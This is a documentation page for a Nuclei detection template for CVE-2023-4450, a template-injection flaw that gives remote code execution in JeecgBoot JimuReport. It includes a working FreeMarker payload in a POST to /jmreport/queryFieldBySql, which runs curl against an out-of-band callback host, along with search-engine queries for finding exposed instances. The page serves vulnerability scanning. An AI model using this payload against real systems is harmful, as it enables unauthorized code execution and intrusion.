Skip to content
Nuclei Templates

JeecgBoot JimuReport - Template injection

ID: CVE-2023-4450

Severity: critical

Author: Sumanth Vankineni

Tags: cve,cve2023,rce,jeecgboot

Description

Section titled “Description”

A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

YAML Source

Section titled “YAML Source”
id: CVE-2023-4450


info:
  name: JeecgBoot JimuReport - Template injection
  author: Sumanth Vankineni
  severity: critical
  description: |
    A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
  impact: |
   Unauthorized api called /jmreport/queryFieldBySql led to remote arbitrary code execution due to parsing SQL statements using Freemarker.
  remediation: |
   Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component.
  reference:
    - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9
    - https://whoopsunix.com/docs/java/named%20module/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4450
  metadata:
    verified: true
    max-request: 1
    vendor: jeecg
    product: jeecg
    shodan-query:
      - title:"Jeecg-Boot"
      - http.title:"jeecg-boot"
    fofa-query:
      - title="JeecgBoot 企业级低代码平台"
      - title="jeecg-boot"
      - title="jeecgboot 企业级低代码平台"
    google-query: intitle:"jeecg-boot"
  tags: cve,cve2023,rce,jeecgboot


http:
  - raw:
      - |
        POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {
          "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://{{interactsh-url}}\")} ",
          "type": "0"
        }


    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
          - 'contains(content_type,"application/json")'
          - 'contains(body,"success")'
        condition: and
# digest: 490a00463044022002ccd5160f28e7f847434bac126eb3050e3d0edcd4778fa3c751ba0d58b47444022044990877a1cb83e41de59e58d0bf6e0433738e220a5e70cc286e4632417c3642:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4450.yaml"

View on Github